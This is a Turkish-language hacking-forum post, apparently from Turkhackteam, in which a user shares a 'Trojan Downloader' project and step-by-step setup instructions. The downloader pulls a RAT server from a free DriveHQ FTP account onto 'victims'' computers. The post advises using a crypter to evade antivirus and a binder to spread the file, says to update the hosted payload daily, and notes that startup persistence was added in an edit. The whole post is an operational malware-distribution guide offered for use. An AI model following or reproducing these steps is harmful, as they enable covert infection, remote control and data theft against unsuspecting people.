CGN ipler için kesin çözüm - FaFu529 Trojan Downloader

FaFu529

Üye
7 Eki 2019
56
1
root@fafu529
Öncelikle Selamun Aleyküm direkt konuya geçeyim
Ben dahil birçok kullanıcı port sıkıntısı çekmekte ve ngrokta pcyi kapatınca kurbanlar gitmekte
Ben de bunun için kesin çözüm buldum ve sizlerle paylaşmak istiyorum konuyu dikkatli okuyun
Gerekenler
Bir Adet Drivehq hesabı - Buraya tıklayarak kaydolabilirsiniz!
Bir Adet FTP Client Yazılımı (winscp öneririm) - Buraya Tıklayarak İndirebilirsiniz!
FaFu529 Trojan Downloader Projesi - Buraya Tıklayarak İndirebilirsiniz!
Ve Visual Studio 2010 veya yeni bir sürümü - Buraya Tıklayarak İndirebilirsiniz!
Yapacaklarımız
Size verdiğim projeyi Visual Studio 2010 veya daha yeni bir sürümüyle açın (Şifre : Şehitler Ölmez)
Kullanıcı Adı ve şifre yazan yerlere Drivehq hesabınızın kullanıcı adı ve şifresini yazın
Trojan.exe yazan yere rat programından oluşturduğunuz serverin adını girin sonuna .exe eklemeyi unutmayın!
Trojan Adı.exe yazan yerlerden ilki serveri hangi adla kaydedeceğini yazın
İkincisi ise serverinizi açmaya yarar onun adını üsttekiyle aynı koyun
Sonra CTRL+SHIFT+B tuş kombinasyonlarına basarak programı build edelim
Hesabınız çalınmasın istiyorsanız (zaten çalınması çok zor böyle birşey olacağını düşünmezler ama her ihtimale karşı) programın yakalanma sayısını arttırmayan bir crypter kullanın (normalde 71 anivirüsten 19 u buluyor onlar da eset veya avast gibi çok kullanılan sağlam antivirüsler değil)
Sonra bir binder yardımıyla dosyanızı birleştirip yayabilirsiniz!
-----------------
Hergün yapılması gerekenler
Kurbanların çoğu bilgisayarı açmadan ftp hesabınızdaki serveri güncelleyin ve kaydedin
FaFu529'a içinizden teşekkür edin :D

Konu yararlı olduysa teşekkür butonuna basmayı unutmayın!
EDİT : Program kendini başlangıca yazmıyordu onu hallettim ve ftp sunucumuz ücretsiz olduğu için maksimum 2 bağlantıya izin veriyordu bu da 2 kurban bilgisayarı kapatmadan başka kurbanlar gelmeyecek anlamına geliyordu artık işini bitirince program kendini kapatıyor

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.